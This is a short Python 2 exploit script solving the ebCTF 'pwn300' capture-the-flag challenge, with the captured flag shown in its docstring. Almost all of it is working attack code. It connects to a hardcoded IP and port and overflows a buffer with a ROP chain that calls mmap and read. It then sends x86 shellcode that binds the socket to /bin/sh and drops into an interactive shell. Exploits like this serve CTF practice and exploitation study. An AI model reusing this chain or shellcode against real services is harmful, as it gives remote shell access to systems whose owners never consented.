ebCTF pwn300

pwn300.py

"""
$python pwn300.py
Interact
cat goproot/FLAG

    0h my g0d, I am defeat.

    Here, take this:

      ebCTF{35a6673b2243c925e02e85dfa916036f}

    Did you know: this daemon was named after a dutch security charlatan?
"""
from socket import create_connection
import telnetlib
import time
"""
base : 0xf7617000
mmap : 0xf77020e0
pop2ret = 0x8048d93
pop3ret = 0x804926b
"""
sk = create_connection(("54.217.15.93",7070))
payload = "A"*72
payload += "938d0408"
payload += "41414141" 
payload += "00a00408"
# mmap(0x01000000,0x30000,7,0x32,-1,0,0);
payload += "e02070f7" 
payload += "908d0408" 
payload += "00000001" 
payload += "00000300" 
payload += "07000000" 
payload += "32000000" 
payload += "ffffffff" 
payload += "00000000" 
payload += "00000000"
# read(4,0x01000000,2)
payload += "c0870408" 
payload += "00000001"
payload += "04000000" 
payload += "00000001" 
payload += "29000000"

payload += "\r\n"
sk.send(payload)
time.sleep(1)
shell = "\x31\xc0\x31\xc9\x31\xdb\xb1\x03\x49\xb0\x3f\xb3\x04\xcd\x80\x75\xf7"
shell += "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
sk.send(shell)
tn = telnetlib.Telnet()
tn.sock = sk
print "Interact"
tn.interact()